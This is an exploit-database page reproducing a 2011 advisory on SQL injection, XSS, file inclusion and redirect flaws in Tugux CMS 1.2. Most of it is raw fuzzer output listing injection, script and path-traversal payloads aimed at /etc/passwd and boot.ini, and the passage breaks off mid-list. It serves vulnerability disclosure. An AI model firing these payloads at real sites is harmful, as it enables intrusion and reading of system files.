header-logo
Suggest Exploit
vendor:
Tugux CMS
by:
Gjoko 'LiquidWorm' Krstic, Zero Science Lab
8.8
CVSS
HIGH
Reflected and stored XSS, SQL Injection, Local File Inclusion, URL Redirection
79, 89, 94, 601
CWE
Product Name: Tugux CMS
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:tugux_studios:tugux_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3 (EN), Apache 2.2.14 (Win32), PHP 5.3.1, MySQL 5.1.41
2011

Tugux CMS 1.2 Multiple Remote Vulnerabilities

The application suffers from multiple issues including: reflected and stored xss, sql Injection, local file inclusion, url redirection. Vulnerable parameters include: 'name', 'comment', 'nid', 'submit1', 'email', 'topic_id'.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries, and that all output is properly encoded before being returned to the user.
Source

Exploit-DB raw data:

Title:

 Tugux CMS 1.2 Multiple Remote Vulnerabilities
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Vendor:

 Tugux Studios
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Product web page:

 http://www.tugux.com
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Affected version:

 1.2
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Summary:

 Tugux CMS is a free, open-source content Management system (CMS) and
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
application that powers the entire web.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Description:

 The application suffers from multiple issues including: reflected
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
and stored xss, sql Injection, local file inclusion, url redirection.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Vulnerable parameters include: 'name', 'comment', 'nid', 'submit1',
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
'email', 'topic_id'.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Tested on:

 Microsoft Windows XP Professional SP3 (EN)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 Apache 2.2.14 (Win32)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 PHP 5.3.1
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 MySQL 5.1.41
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Vulnerability discovered by:

 Gjoko 'LiquidWorm' Krstic, Zero Science Lab
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 liquidworm * gmail * com
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Advisory details:

 ID: ZSL-2011-5014
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5014.php
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Discovery date:

 02.04.2011
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Raw analysis report:

 http://www.zeroscience.mk/codes/tugux_raw_02042011.txt
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
           by PowerFuzzer
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                                                          (c) Joxy
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Findings summary

MySQL Injection (nid) in http://localhost/tugux/comments.php
Vulnerable URL: http://localhost/tugux/comments.php?nid=%BF%27%22%28
XSS (nid) in http://localhost/tugux/comments.php
Vulnerable URL: http://localhost/tugux/comments.php?nid=<script>var+pf_687474703a2f2f6c6f63616c686f73742f74756775782f636f6d6d656e74732e706870_6e6964=new+Boolean();</script>
Warning include (nid) in http://localhost/tugux/latest.php
Vulnerable URL: http://localhost/tugux/latest.php?nid=http%3A%2F%2Fwww.google.com%2F
MySQL Injection (nid) in http://localhost/tugux/latest.php
Vulnerable URL: http://localhost/tugux/latest.php?nid=%BF%27%22%28
XSS (nid) in http://localhost/tugux/latest.php
Vulnerable URL: http://localhost/tugux/latest.php?nid=<script>var+pf_687474703a2f2f6c6f63616c686f73742f74756775782f6c61746573742e706870_6e6964=new+Boolean();</script>
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=yes&company=on&email=%BF%27%22%28&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=%BF%27%22%28&company=on&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=%BF%27%22%28&yes=yes&company=on&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=yes&company=%BF%27%22%28&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=%BF%27%22%28&name=on&yes=yes&company=on&email=on&subject=on
 coming fromhttp://localhost/tugux/contact.php
MySQL Injection in http://localhost/tugux/contact.php
 with params =message=on&name=on&yes=yes&company=on&email=on&subject=%BF%27%22%28
 coming fromhttp://localhost/tugux/contact.php
XSS in http://localhost/tugux/contact.php
  with params =message=on&name=on&yes=yes&company=on&email=%3Cscript%3Evar+pf_687474703a2f2f6c6f63616c686f73742f74756775782f636f6e746163742e706870_656d61696c%3Dnew+Boolean%28%29%3B%3C%2Fscript%3E&subject=on
  coming fromhttp://localhost/tugux/contact.php
XSS in http://localhost/tugux/contact.php
  with params =message=on&name=%3Cscript%3Evar+pf_687474703a2f2f6c6f63616c686f73742f74756775782f636f6e746163742e706870_6e616d65%3Dnew+Boolean%28%29%3B%3C%2Fscript%3E&yes=yes&company=on&email=on&subject=on
  coming fromhttp://localhost/tugux/contact.php
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=http%3A%2F%2Fwww.google.com%2F&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=http%3A%2F%2Fwww.google.com%2F
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=http%3A%2F%2Fwww.google.com%2F&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=http%3A%2F%2Fwww.google.com%2F&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=http%3A%2F%2Fwww.google.com%2F&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=c%3A%5C%5Cboot.ini&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=c%3A%5C%5Cboot.ini&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=c%3A%5C%5Cboot.ini%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=c%3A%5C%5Cboot.ini%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&email=on&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=10
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&name=on&submit1=Submit&topic_id=10
  coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=%BF%27%22%28&email=on&name=on&submit1=Submit&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%BF%27%22%28
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=on&name=%BF%27%22%28&submit1=Submit&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=on&name=on&submit1=%BF%27%22%28&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
MySQL Injection in http://localhost/tugux/latest.php?nid=10
 with params =comment=on&email=%BF%27%22%28&name=on&submit1=Submit&topic_id=10
 coming fromhttp://localhost/tugux/comments.php?nid=10
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=http%3A%2F%2Fwww.google.com%2F&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=http%3A%2F%2Fwww.google.com%2F
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=http%3A%2F%2Fwww.google.com%2F&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=http%3A%2F%2Fwww.google.com%2F&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=http%3A%2F%2Fwww.google.com%2F&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=c%3A%5C%5Cboot.ini&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=c%3A%5C%5Cboot.ini&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=c%3A%5C%5Cboot.ini%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=c%3A%5C%5Cboot.ini%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
